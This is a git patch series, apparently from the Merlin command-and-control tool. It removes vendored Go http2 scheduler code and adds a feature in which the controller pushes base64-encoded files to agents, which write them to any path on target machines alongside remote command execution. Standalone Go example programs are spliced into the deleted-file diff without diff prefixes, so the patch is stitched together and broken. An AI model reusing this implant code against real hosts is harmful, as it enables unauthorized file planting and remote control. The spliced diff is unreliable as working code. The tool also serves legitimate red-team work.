-func (p *writeQueuePool) get() *writeQueue { - ln := len(*p) - if ln == 0 { - return new(writeQueue) - } - x := ln - 1 - q := (*p)[x] - (*p)[x] = nil - *p = (*p)[:x] - return q -} diff --git a/vendor/golang.org/x/net/http2/writesched_priority.go b/vendor/golang.org/x/net/http2/writesched_priority.go deleted file mode 100644 index 848fed6e..00000000 --- a/vendor/golang.org/x/net/http2/writesched_priority.go +++ /dev/null @@ -1,452 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "fmt" - "math" - "sort" -) - -// RFC 7540, Section 5.3.5: the default weight is 16. -const priorityDefaultWeight = 15 // 16 = 15 + 1 - -// PriorityWriteSchedulerConfig configures a priorityWriteScheduler. -type PriorityWriteSchedulerConfig struct { - // MaxClosedNodesInTree controls the maximum number of closed streams to - // retain in the priority tree. Setting this to zero saves a small amount - // of memory at the cost of performance. - // - // See RFC 7540, Section 5.3.4: - // "It is possible for a stream to become closed while prioritization - // information ... is in transit. ... This potentially creates suboptimal - // prioritization, since the stream could be given a priority that is - // different from what is intended. To avoid these problems, an endpoint - // SHOULD retain stream prioritization state for a period after streams - // become closed. The longer state is retained, the lower the chance that - // streams are assigned incorrect or default priority values." - MaxClosedNodesInTree int - - // MaxIdleNodesInTree controls the maximum number of idle streams to - // retain in the priority tree. Setting this to zero saves a small amount - // of memory at the cost of performance. - // - // See RFC 7540, Section 5.3.4: - // Similarly, streams that are in the "idle" state can be assigned - // priority or become a parent of other streams. This allows for the - // creation of a grouping node in the dependency tree, which enables - // more flexible expressions of priority. Idle streams begin with a - // default priority (Section 5.3.5). - MaxIdleNodesInTree int - - // ThrottleOutOfOrderWrites enables write throttling to help ensure that - // data is delivered in priority order. This works around a race where - // stream B depends on stream A and both streams are about to call Write - // to queue DATA frames. If B wins the race, a naive scheduler would eagerly - // write as much data from B as possible, but this is suboptimal because A - // is a higher-priority stream. With throttling enabled, we write a small - // amount of data from B to minimize the amount of bandwidth that B can - // steal from A. - ThrottleOutOfOrderWrites bool -} - -// NewPriorityWriteScheduler constructs a WriteScheduler that schedules -// frames by following HTTP/2 priorities as described in RFC 7540 Section 5.3. -// If cfg is nil, default options are used. 
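// Although this vendored copy is being removed, NewPriorityWriteScheduler and
// the WriteScheduler interface remain exported from golang.org/x/net/http2, so
// a server can still choose its scheduler explicitly. A minimal sketch,
// assuming the NewWriteScheduler hook on http2.Server; the address and
// certificate paths are placeholders.
package main

import (
	"log"
	"net/http"

	"golang.org/x/net/http2"
)

func main() {
	srv := &http.Server{Addr: ":8443", Handler: http.DefaultServeMux}
	err := http2.ConfigureServer(srv, &http2.Server{
		NewWriteScheduler: func() http2.WriteScheduler {
			return http2.NewPriorityWriteScheduler(nil) // nil selects the defaults documented above
		},
	})
	if err != nil {
		log.Fatal(err)
	}
	log.Fatal(srv.ListenAndServeTLS("server.crt", "server.key"))
}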
-func NewPriorityWriteScheduler(cfg *PriorityWriteSchedulerConfig) WriteScheduler { - if cfg == nil { - // For justification of these defaults, see: - // https://docs.google.com/document/d/1oLhNg1skaWD4_DtaoCxdSRN5erEXrH-KnLrMwEpOtFY - cfg = &PriorityWriteSchedulerConfig{ - MaxClosedNodesInTree: 10, - MaxIdleNodesInTree: 10, - ThrottleOutOfOrderWrites: false, - } - } - - ws := &priorityWriteScheduler{ - nodes: make(map[uint32]*priorityNode), - maxClosedNodesInTree: cfg.MaxClosedNodesInTree, - maxIdleNodesInTree: cfg.MaxIdleNodesInTree, - enableWriteThrottle: cfg.ThrottleOutOfOrderWrites, - } - ws.nodes[0] = &ws.root - if cfg.ThrottleOutOfOrderWrites { - ws.writeThrottleLimit = 1024 - } else { - ws.writeThrottleLimit = math.MaxInt32 - } - return ws -} - -type priorityNodeState int - -const ( - priorityNodeOpen priorityNodeState = iota - priorityNodeClosed - priorityNodeIdle -) - -// priorityNode is a node in an HTTP/2 priority tree. -// Each node is associated with a single stream ID. -// See RFC 7540, Section 5.3. -type priorityNode struct { - q writeQueue // queue of pending frames to write - id uint32 // id of the stream, or 0 for the root of the tree - weight uint8 // the actual weight is weight+1, so the value is in [1,256] - state priorityNodeState // open | closed | idle - bytes int64 // number of bytes written by this node, or 0 if closed - subtreeBytes int64 // sum(node.bytes) of all nodes in this subtree - - // These links form the priority tree. - parent *priorityNode - kids *priorityNode // start of the kids list - prev, next *priorityNode // doubly-linked list of siblings -} - -func (n *priorityNode) setParent(parent *priorityNode) { - if n == parent { - panic("setParent to self") - } - if n.parent == parent { - return - } - // Unlink from current parent. - if parent := n.parent; parent != nil { - if n.prev == nil { - parent.kids = n.next - } else { - n.prev.next = n.next - } - if n.next != nil { - n.next.prev = n.prev - } - } - // Link to new parent. - // If parent=nil, remove n from the tree. - // Always insert at the head of parent.kids (this is assumed by walkReadyInOrder). - n.parent = parent - if parent == nil { - n.next = nil - n.prev = nil - } else { - n.next = parent.kids - n.prev = nil - if n.next != nil { - n.next.prev = n - } - parent.kids = n - } -} - -func (n *priorityNode) addBytes(b int64) { - n.bytes += b - for ; n != nil; n = n.parent { - n.subtreeBytes += b - } -} - -// walkReadyInOrder iterates over the tree in priority order, calling f for each node -// with a non-empty write queue. When f returns true, this funcion returns true and the -// walk halts. tmp is used as scratch space for sorting. -// -// f(n, openParent) takes two arguments: the node to visit, n, and a bool that is true -// if any ancestor p of n is still open (ignoring the root node). -func (n *priorityNode) walkReadyInOrder(openParent bool, tmp *[]*priorityNode, f func(*priorityNode, bool) bool) bool { - if !n.q.empty() && f(n, openParent) { - return true - } - if n.kids == nil { - return false - } - - // Don't consider the root "open" when updating openParent since - // we can't send data frames on the root stream (only control frames). - if n.id != 0 { - openParent = openParent || (n.state == priorityNodeOpen) - } - - // Common case: only one kid or all kids have the same weight. - // Some clients don't use weights; other clients (like web browsers) - // use mostly-linear priority trees. 
- w := n.kids.weight - needSort := false - for k := n.kids.next; k != nil; k = k.next { - if k.weight != w { - needSort = true - break - } - } - if !needSort { - for k := n.kids; k != nil; k = k.next { - if k.walkReadyInOrder(openParent, tmp, f) { - return true - } - } - return false - } - - // Uncommon case: sort the child nodes. We remove the kids from the parent, - // then re-insert after sorting so we can reuse tmp for future sort calls. - *tmp = (*tmp)[:0] - for n.kids != nil { - *tmp = append(*tmp, n.kids) - n.kids.setParent(nil) - } - sort.Sort(sortPriorityNodeSiblings(*tmp)) - for i := len(*tmp) - 1; i >= 0; i-- { - (*tmp)[i].setParent(n) // setParent inserts at the head of n.kids - } - for k := n.kids; k != nil; k = k.next { - if k.walkReadyInOrder(openParent, tmp, f) { - return true - } - } - return false -} - -type sortPriorityNodeSiblings []*priorityNode - -func (z sortPriorityNodeSiblings) Len() int { return len(z) } -func (z sortPriorityNodeSiblings) Swap(i, k int) { z[i], z[k] = z[k], z[i] } -func (z sortPriorityNodeSiblings) Less(i, k int) bool { - // Prefer the subtree that has sent fewer bytes relative to its weight. - // See sections 5.3.2 and 5.3.4. - wi, bi := float64(z[i].weight+1), float64(z[i].subtreeBytes) - wk, bk := float64(z[k].weight+1), float64(z[k].subtreeBytes) - if bi == 0 && bk == 0 { - return wi >= wk - } - if bk == 0 { - return false - } - return bi/bk <= wi/wk -} - -type priorityWriteScheduler struct { - // root is the root of the priority tree, where root.id = 0. - // The root queues control frames that are not associated with any stream. - root priorityNode - - // nodes maps stream ids to priority tree nodes. - nodes map[uint32]*priorityNode - - // maxID is the maximum stream id in nodes. - maxID uint32 - - // lists of nodes that have been closed or are idle, but are kept in - // the tree for improved prioritization. When the lengths exceed either - // maxClosedNodesInTree or maxIdleNodesInTree, old nodes are discarded. - closedNodes, idleNodes []*priorityNode - - // From the config. - maxClosedNodesInTree int - maxIdleNodesInTree int - writeThrottleLimit int32 - enableWriteThrottle bool - - // tmp is scratch space for priorityNode.walkReadyInOrder to reduce allocations. - tmp []*priorityNode - - // pool of empty queues for reuse. - queuePool writeQueuePool -} - -func (ws *priorityWriteScheduler) OpenStream(streamID uint32, options OpenStreamOptions) { - // The stream may be currently idle but cannot be opened or closed. - if curr := ws.nodes[streamID]; curr != nil { - if curr.state != priorityNodeIdle { - panic(fmt.Sprintf("stream %d already opened", streamID)) - } - curr.state = priorityNodeOpen - return - } - - // RFC 7540, Section 5.3.5: - // "All streams are initially assigned a non-exclusive dependency on stream 0x0. - // Pushed streams initially depend on their associated stream. In both cases, - // streams are assigned a default weight of 16." 
- parent := ws.nodes[options.PusherID] - if parent == nil { - parent = &ws.root - } - n := &priorityNode{ - q: *ws.queuePool.get(), - id: streamID, - weight: priorityDefaultWeight, - state: priorityNodeOpen, - } - n.setParent(parent) - ws.nodes[streamID] = n - if streamID > ws.maxID { - ws.maxID = streamID - } -} - -func (ws *priorityWriteScheduler) CloseStream(streamID uint32) { - if streamID == 0 { - panic("violation of WriteScheduler interface: cannot close stream 0") - } - if ws.nodes[streamID] == nil { - panic(fmt.Sprintf("violation of WriteScheduler interface: unknown stream %d", streamID)) - } - if ws.nodes[streamID].state != priorityNodeOpen { - panic(fmt.Sprintf("violation of WriteScheduler interface: stream %d already closed", streamID)) - } - - n := ws.nodes[streamID] - n.state = priorityNodeClosed - n.addBytes(-n.bytes) - - q := n.q - ws.queuePool.put(&q) - n.q.s = nil - if ws.maxClosedNodesInTree > 0 { - ws.addClosedOrIdleNode(&ws.closedNodes, ws.maxClosedNodesInTree, n) - } else { - ws.removeNode(n) - } -} - -func (ws *priorityWriteScheduler) AdjustStream(streamID uint32, priority PriorityParam) { - if streamID == 0 { - panic("adjustPriority on root") - } - - // If streamID does not exist, there are two cases: - // - A closed stream that has been removed (this will have ID <= maxID) - // - An idle stream that is being used for "grouping" (this will have ID > maxID) - n := ws.nodes[streamID] - if n == nil { - if streamID <= ws.maxID || ws.maxIdleNodesInTree == 0 { - return - } - ws.maxID = streamID - n = &priorityNode{ - q: *ws.queuePool.get(), - id: streamID, - weight: priorityDefaultWeight, - state: priorityNodeIdle, - } - n.setParent(&ws.root) - ws.nodes[streamID] = n - ws.addClosedOrIdleNode(&ws.idleNodes, ws.maxIdleNodesInTree, n) - } - - // Section 5.3.1: A dependency on a stream that is not currently in the tree - // results in that stream being given a default priority (Section 5.3.5). - parent := ws.nodes[priority.StreamDep] - if parent == nil { - n.setParent(&ws.root) - n.weight = priorityDefaultWeight - return - } - - // Ignore if the client tries to make a node its own parent. - if n == parent { - return - } - - // Section 5.3.3: - // "If a stream is made dependent on one of its own dependencies, the - // formerly dependent stream is first moved to be dependent on the - // reprioritized stream's previous parent. The moved dependency retains - // its weight." - // - // That is: if parent depends on n, move parent to depend on n.parent. - for x := parent.parent; x != nil; x = x.parent { - if x == n { - parent.setParent(n.parent) - break - } - } - - // Section 5.3.3: The exclusive flag causes the stream to become the sole - // dependency of its parent stream, causing other dependencies to become - // dependent on the exclusive stream. - if priority.Exclusive { - k := parent.kids - for k != nil { - next := k.next - if k != n { - k.setParent(n) - } - k = next - } - } - - n.setParent(parent) - n.weight = priority.Weight -} - -func (ws *priorityWriteScheduler) Push(wr FrameWriteRequest) { - var n *priorityNode - if id := wr.StreamID(); id == 0 { - n = &ws.root - } else { - n = ws.nodes[id] - if n == nil { - // id is an idle or closed stream. wr should not be a HEADERS or - // DATA frame. However, wr can be a RST_STREAM. In this case, we - // push wr onto the root, rather than creating a new priorityNode, - // since RST_STREAM is tiny and the stream's priority is unknown - // anyway. See issue #17919. 
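// The bookkeeping above is reachable through the exported WriteScheduler
// interface. A small sketch that exercises only the stream operations (Push
// and Pop need frame types that cannot be built outside this package); the
// stream IDs and weight are invented.
package main

import "golang.org/x/net/http2"

func main() {
	ws := http2.NewPriorityWriteScheduler(nil)

	ws.OpenStream(3, http2.OpenStreamOptions{})
	ws.OpenStream(5, http2.OpenStreamOptions{})

	// Make stream 5 depend exclusively on stream 3 with a heavier weight.
	ws.AdjustStream(5, http2.PriorityParam{StreamDep: 3, Weight: 31, Exclusive: true})

	// Closed nodes may be retained for better prioritization (MaxClosedNodesInTree).
	ws.CloseStream(3)
	ws.CloseStream(5)
}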
- if wr.DataSize() > 0 { - panic("add DATA on non-open stream") - } - n = &ws.root - } - } - n.q.push(wr) -} - -func (ws *priorityWriteScheduler) Pop() (wr FrameWriteRequest, ok bool) { - ws.root.walkReadyInOrder(false, &ws.tmp, func(n *priorityNode, openParent bool) bool { - limit := int32(math.MaxInt32) - if openParent { - limit = ws.writeThrottleLimit - } - wr, ok = n.q.consume(limit) - if !ok { - return false - } - n.addBytes(int64(wr.DataSize())) - // If B depends on A and B continuously has data available but A - // does not, gradually increase the throttling limit to allow B to - // steal more and more bandwidth from A. - if openParent { - ws.writeThrottleLimit += 1024 - if ws.writeThrottleLimit < 0 { - ws.writeThrottleLimit = math.MaxInt32 - } - } else if ws.enableWriteThrottle { - ws.writeThrottleLimit = 1024 - } - return true - }) - return wr, ok -} - -func (ws *priorityWriteScheduler) addClosedOrIdleNode(list *[]*priorityNode, maxSize int, n *priorityNode) { - if maxSize == 0 { - return - } - if len(*list) == maxSize { - // Remove the oldest node, then shift left. - ws.removeNode((*list)[0]) - x := (*list)[1:] - copy(*list, x) - *list = (*list)[:len(x)] - } - *list = append(*list, n) -} - -func (ws *priorityWriteScheduler) removeNode(n *priorityNode) { - for k := n.kids; k != nil; k = k.next { - k.setParent(n.parent) - } - n.setParent(nil) - delete(ws.nodes, n.id) -} diff --git a/vendor/golang.org/x/net/http2/writesched_random.go b/vendor/golang.org/x/net/http2/writesched_random.go deleted file mode 100644 index 36d7919f..00000000 --- a/vendor/golang.org/x/net/http2/writesched_random.go +++ /dev/null @@ -1,72 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import "math" - -// NewRandomWriteScheduler constructs a WriteScheduler that ignores HTTP/2 -// priorities. Control frames like SETTINGS and PING are written before DATA -// frames, but if no control frames are queued and multiple streams have queued -// HEADERS or DATA frames, Pop selects a ready stream arbitrarily. -func NewRandomWriteScheduler() WriteScheduler { - return &randomWriteScheduler{sq: make(map[uint32]*writeQueue)} -} - -type randomWriteScheduler struct { - // zero are frames not associated with a specific stream. - zero writeQueue - - // sq contains the stream-specific queues, keyed by stream ID. - // When a stream is idle or closed, it's deleted from the map. - sq map[uint32]*writeQueue - - // pool of empty queues for reuse. - queuePool writeQueuePool -} - -func (ws *randomWriteScheduler) OpenStream(streamID uint32, options OpenStreamOptions) { - // no-op: idle streams are not tracked -} - -func (ws *randomWriteScheduler) CloseStream(streamID uint32) { - q, ok := ws.sq[streamID] - if !ok { - return - } - delete(ws.sq, streamID) - ws.queuePool.put(q) -} - -func (ws *randomWriteScheduler) AdjustStream(streamID uint32, priority PriorityParam) { - // no-op: priorities are ignored -} - -func (ws *randomWriteScheduler) Push(wr FrameWriteRequest) { - id := wr.StreamID() - if id == 0 { - ws.zero.push(wr) - return - } - q, ok := ws.sq[id] - if !ok { - q = ws.queuePool.get() - ws.sq[id] = q - } - q.push(wr) -} - -func (ws *randomWriteScheduler) Pop() (FrameWriteRequest, bool) { - // Control frames first. - if !ws.zero.empty() { - return ws.zero.shift(), true - } - // Iterate over all non-idle streams until finding one that can be consumed. 
- for _, q := range ws.sq { - if wr, ok := q.consume(math.MaxInt32); ok { - return wr, true - } - } - return FrameWriteRequest{}, false -} diff --git a/vendor/vendor.json b/vendor/vendor.json deleted file mode 100644 index 662f9463..00000000 --- a/vendor/vendor.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "comment": "", - "ignore": "test", - "package": [ - { - "checksumSHA1": "K2hmSp4Kv/6PEBs/aXFpKrGFDvk=", - "path": "github.com/chzyer/readline", - "revision": "41eea22f717c616615e1e59aa06cf831f9901f35", - "revisionTime": "2017-03-13T23:49:21Z" - }, - { - "checksumSHA1": "AXA+JyaZ70zQ49yj43VfPVi0OPs=", - "path": "github.com/fatih/color", - "revision": "bf82308e8c8546dc2b945157173eb8a959ae9505", - "revisionTime": "2016-10-25T12:05:01Z" - }, - { - "checksumSHA1": "+a74DVHv7qMIr5BEg1PnPOdgaT4=", - "path": "github.com/mattn/go-shellwords", - "revision": "95c860c1895b21b58903abdd1d9c591560b0601c", - "revisionTime": "2017-08-28T04:11:23Z" - }, - { - "checksumSHA1": "Pc8xXumeXymW7wNgN5lNW8RG9kU=", - "path": "github.com/olekukonko/tablewriter", - "revision": "febf2d34b54a69ce7530036c7503b1c9fbfdf0bb", - "revisionTime": "2017-01-28T05:05:32Z" - }, - { - "checksumSHA1": "HUXE+Nrcau8FSaVEvPYHMvDjxOE=", - "path": "github.com/satori/go.uuid", - "revision": "b061729afc07e77a8aa4fad0a2fd840958f1942a", - "revisionTime": "2016-09-27T10:08:44Z" - }, - { - "checksumSHA1": "kKuxyoDujo5CopTxAvvZ1rrLdd0=", - "path": "golang.org/x/net/http2", - "revision": "054b33e6527139ad5b1ec2f6232c3b175bd9a30c", - "revisionTime": "2017-07-05T22:25:54Z" - } - ], - "rootPath": "github.com/ne0nd0g/merlin" -} From ca8eaee6e353c12a1cb5229f2bf85fe9976de248 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 11:25:52 -0500 Subject: [PATCH 08/60] Upload start --- Makefile | 2 +- cmd/merlinagent/main.go | 11 +++++++++++ cmd/merlinserver/main.go | 28 ++++++++++++++++++++++++++++ pkg/messages/messages.go | 7 +++++++ 4 files changed, 47 insertions(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 54b77d90..ea75f722 100644 --- a/Makefile +++ b/Makefile @@ -23,7 +23,7 @@ D=Darwin-x64 $(shell mkdir -p ${DIR}) # Change default to just make for the host OS and add MAKE ALL to do this -default: server-windows agent-windows server-linux agent-linux server-darwin agent-darwin +default: server-darwin agent-darwin all: default diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 0229871a..2583eae9 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -258,6 +258,17 @@ func statusCheckIn(host string, client *http.Client) { color.Green("%s Message Type Received!", j.Type) } switch j.Type { // TODO add self destruct that will find the .exe current path and start a new process to delete it after initial sleep + case "UploadFile": + var p messages.UploadFile + json.Unmarshal(payload, &p) + + if verbose { + color.Yellow("Writing blob to : %s", p.Dest) + } + resp2, _ := client.Post(host, "application/json; charset=utf-8", b2) + if resp2.StatusCode != 200 { + color.Red("Message error from server. 
HTTP Status code: %d", resp2.StatusCode) + } case "CmdPayload": var p messages.CmdPayload json.Unmarshal(payload, &p) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index dea71bad..cc50979c 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -408,6 +408,18 @@ func statusCheckIn(j messages.Base) messages.Base { } switch command[1] { + case "upload": + p := messages.UploadFile{ + Dest: command[4], + FileBlob: command[3], + Job: jobID, + } + + k := marshalMessage(p) + m.Type = "UploadFile" + m.Payload = (*json.RawMessage)(&k) + + return m case "cmd": p := messages.CmdPayload{ Command: command[3], @@ -480,6 +492,7 @@ func usage() { data := [][]string{ {"agent cmd", " ", "", "Run a command on target's operating system"}, + {"agent upload", " ", "", "Upload a file to target"}, {"agent control", " ", "sleep, kill, padding", "Control messages & " + "functions to the agent itself"}, {"agent info", "", "", "Display all information about an agent"}, @@ -525,6 +538,9 @@ func shell() { readline.PcItem("cmd", agentCompleter, ), + readline.PcItem("upload", + agentCompleter, + ), readline.PcItem("control", readline.PcItemDynamic(getAgentList(), readline.PcItem("sleep"), @@ -620,6 +636,18 @@ func shell() { table.Render() fmt.Println() } + case "upload": + if len(cmd) >= 5 { + addChannel(cmd) + cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3])) + if debug { + color.Red("[DEBUG]Input: %s", cmd[3]) + color.Red("[DEBUG]Base64 Input: %s", cmdAgent) + } + } else { + color.Red("[!]Invalid file or path") + color.White("agent upload ") + } case "cmd": if len(cmd) >= 4 { addChannel(cmd) diff --git a/pkg/messages/messages.go b/pkg/messages/messages.go index 07c3eb08..a194f3d7 100644 --- a/pkg/messages/messages.go +++ b/pkg/messages/messages.go @@ -30,6 +30,13 @@ type Base struct { Padding string `json:"padding"` } +// UploadFile is the JSON payload for files to be uploaded to an agent +type UploadFile struct { + Dest string `json:"dest"` + FileBlob string `json:"blob"` + Job string `json:"job"` +} + // CmdPayload is the JSON payload for commands to execute on an agent type CmdPayload struct { Command string `json:"executable"` From 9395f43515bf5bdec181c88c13df3d4570e3af4a Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 12:00:49 -0500 Subject: [PATCH 09/60] Removed the remote packaging of the local depedencies --- cmd/merlinagent/main.go | 8 ++------ cmd/merlinserver/main.go | 6 +++--- 2 files changed, 5 insertions(+), 9 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 2583eae9..8df2df00 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -35,8 +35,8 @@ import ( "github.com/satori/go.uuid" "golang.org/x/net/http2" - "github.com/ne0nd0g/merlin/pkg/agent" - "github.com/ne0nd0g/merlin/pkg/messages" + "../../pkg/agent" + "../../pkg/messages" ) // GLOBAL VARIABLES @@ -265,10 +265,6 @@ func statusCheckIn(host string, client *http.Client) { if verbose { color.Yellow("Writing blob to : %s", p.Dest) } - resp2, _ := client.Post(host, "application/json; charset=utf-8", b2) - if resp2.StatusCode != 200 { - color.Red("Message error from server. 
HTTP Status code: %d", resp2.StatusCode) - } case "CmdPayload": var p messages.CmdPayload json.Unmarshal(payload, &p) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index cc50979c..a66b58e6 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -41,9 +41,9 @@ import ( "github.com/satori/go.uuid" // Merlin - "github.com/ne0nd0g/merlin/pkg" - "github.com/ne0nd0g/merlin/pkg/banner" - "github.com/ne0nd0g/merlin/pkg/messages" + "../../pkg" + "../../pkg/banner" + "../../pkg/messages" ) // Global Variables From 3b5968f6d5c78bb6f26b7718fc36ba05fada9349 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 16:16:40 -0500 Subject: [PATCH 10/60] Basic file upload, limited error checking --- cmd/merlinagent/main.go | 14 ++++++++++++-- cmd/merlinserver/main.go | 21 ++++++++++++++++----- 2 files changed, 28 insertions(+), 7 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 8df2df00..2f6b0640 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -20,9 +20,11 @@ package main import ( "bytes" "crypto/tls" + "encoding/base64" "encoding/json" "flag" "fmt" + "io/ioutil" "math/rand" "net/http" "os" @@ -45,7 +47,7 @@ var debug = false var verbose = false var mRun = true var hostUUID = uuid.NewV4() -var url = "https://127.0.0.1:443/" +var url = "https://127.0.0.1:4433/" var h2Client = getH2WebClient() var waitTime = 30000 * time.Millisecond var agentShell = "" @@ -261,8 +263,16 @@ func statusCheckIn(host string, client *http.Client) { case "UploadFile": var p messages.UploadFile json.Unmarshal(payload, &p) + d1, _ := base64.StdEncoding.DecodeString(p.FileBlob) + err := ioutil.WriteFile(p.Dest, d1, 0644) + if err != nil { + if verbose { + color.Red("[!]There was an error writing to : %s", p.Dest) + color.Red(err.Error()) + } + } - if verbose { + if verbose || debug { color.Yellow("Writing blob to : %s", p.Dest) } case "CmdPayload": diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index a66b58e6..9a2b7ed2 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -25,6 +25,7 @@ import ( "flag" "fmt" "io" + "io/ioutil" "log" "math/rand" "net/http" @@ -88,7 +89,7 @@ func main() { flag.BoolVar(&verbose, "v", false, "Enable verbose output") flag.BoolVar(&debug, "debug", false, "Enable debug output") - port := flag.Int("p", 443, "Merlin Server Port") + port := flag.Int("p", 4433, "Merlin Server Port") ip := flag.String("i", "0.0.0.0", "The IP address of the interface to bind to") crt := flag.String("x509cert", filepath.Join(string(currentDir), "data", "x509", "server.crt"), "The x509 certificate for the HTTPS listener") @@ -409,9 +410,10 @@ func statusCheckIn(j messages.Base) messages.Base { switch command[1] { case "upload": + fileData := getFiledata(command[3]) p := messages.UploadFile{ Dest: command[4], - FileBlob: command[3], + FileBlob: fileData, Job: jobID, } @@ -639,10 +641,8 @@ func shell() { case "upload": if len(cmd) >= 5 { addChannel(cmd) - cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3])) if debug { - color.Red("[DEBUG]Input: %s", cmd[3]) - color.Red("[DEBUG]Base64 Input: %s", cmdAgent) + color.Red("[DEBUG]Input: %s", strings.Join(cmd[3:], " ")) } } else { color.Red("[!]Invalid file or path") @@ -764,6 +764,15 @@ func marshalMessage(m interface{}) []byte { return k } +func getFiledata(filePath string) string { + dat, err := ioutil.ReadFile(filePath) + if err != nil { + color.Red("There was an error reading %s", filePath) + color.Red(err.Error()) + } + return 
base64.StdEncoding.EncodeToString([]byte(dat)) +} + func addChannel(cmd []string) { a, err := uuid.FromString(cmd[2]) if err != nil { @@ -799,3 +808,5 @@ type agent struct { // TODO add warning for using distributed TLS cert // TODO change default useragent from Go-http-client/2.0 // TODO add CSRF tokens +// TODO check if agentLog exists even outside of InitialCheckIn +// TODO readline for file paths to use with upload From 057ecd04903db6e7c7fbd60cd46b004fe0b03261 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 16:29:35 -0500 Subject: [PATCH 11/60] Using Fields for better command parsing --- cmd/merlinserver/main.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index 9a2b7ed2..8b8150f6 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -591,7 +591,7 @@ func shell() { } line = strings.TrimSpace(line) - cmd := strings.Split(line, " ") + cmd := strings.Fields(line) switch cmd[0] { case "agent": From 744f44d74104bad4769b2f88ad139f88585c8d14 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 16:53:49 -0500 Subject: [PATCH 12/60] Error handling for FileUpload Checking base64 decode and file existance during tasking --- cmd/merlinagent/main.go | 10 +- cmd/merlinserver/main.go | 244 ++++++++++++++++++++------------------- 2 files changed, 134 insertions(+), 120 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 2f6b0640..1cbd67e7 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -263,8 +263,14 @@ func statusCheckIn(host string, client *http.Client) { case "UploadFile": var p messages.UploadFile json.Unmarshal(payload, &p) - d1, _ := base64.StdEncoding.DecodeString(p.FileBlob) - err := ioutil.WriteFile(p.Dest, d1, 0644) + d1, err := base64.StdEncoding.DecodeString(p.FileBlob) + if err != nil { + if verbose { + color.Red("[!]There was an error decoding the fileBlob") + color.Red(err.Error()) + } + } + err = ioutil.WriteFile(p.Dest, d1, 0644) if err != nil { if verbose { color.Red("[!]There was an error writing to : %s", p.Dest) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index 8b8150f6..36248970 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -593,146 +593,154 @@ func shell() { line = strings.TrimSpace(line) cmd := strings.Fields(line) - switch cmd[0] { - case "agent": - if len(cmd) > 1 { - switch cmd[1] { - case "list": - table := tablewriter.NewWriter(os.Stdout) - table.SetHeader([]string{"Agent GUID", "Platform", "User", "Host", "Transport"}) - table.SetAlignment(tablewriter.ALIGN_CENTER) - for k, v := range agents { - table.Append([]string{k.String(), v.platform + "/" + v.architecture, v.userName, - v.hostName, "HTTP/2"}) - } - fmt.Println() - table.Render() - fmt.Println() - case "info": - if len(cmd) == 2 { - color.Red("[!]Invalid command") - color.White("agent info ") - } else if len(cmd) >= 3 { - a, _ := uuid.FromString(cmd[2]) + if len(cmd) > 0 { + switch cmd[0] { + case "agent": + if len(cmd) > 1 { + switch cmd[1] { + case "list": table := tablewriter.NewWriter(os.Stdout) - table.SetAlignment(tablewriter.ALIGN_LEFT) - data := [][]string{ - {"ID", agents[a].id.String()}, - {"Platform", agents[a].platform}, - {"Architecture", agents[a].architecture}, - {"UserName", agents[a].userName}, - {"User GUID", agents[a].userGUID}, - {"Hostname", agents[a].hostName}, - {"Process ID", strconv.Itoa(agents[a].pid)}, - {"Initial Check In", agents[a].iCheckIn.String()}, - {"Last Check In", 
agents[a].sCheckIn.String()}, - {"Agent Version", agents[a].version}, - {"Agent Build", agents[a].build}, - {"Agent Wait Time", agents[a].waitTime}, - {"Agent Message Padding Max", strconv.Itoa(agents[a].paddingMax)}, - {"Agent Max Retries", strconv.Itoa(agents[a].maxRetry)}, - {"Agent Failed Logins", strconv.Itoa(agents[a].failedCheckin)}, + table.SetHeader([]string{"Agent GUID", "Platform", "User", "Host", "Transport"}) + table.SetAlignment(tablewriter.ALIGN_CENTER) + for k, v := range agents { + table.Append([]string{k.String(), v.platform + "/" + v.architecture, v.userName, + v.hostName, "HTTP/2"}) } - table.AppendBulk(data) fmt.Println() table.Render() fmt.Println() - } - case "upload": - if len(cmd) >= 5 { - addChannel(cmd) - if debug { - color.Red("[DEBUG]Input: %s", strings.Join(cmd[3:], " ")) - } - } else { - color.Red("[!]Invalid file or path") - color.White("agent upload ") - } - case "cmd": - if len(cmd) >= 4 { - addChannel(cmd) - cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3])) - if debug { - color.Red("[DEBUG]Input: %s", cmd[3]) - color.Red("[DEBUG]Base64 Input: %s", cmdAgent) + case "info": + if 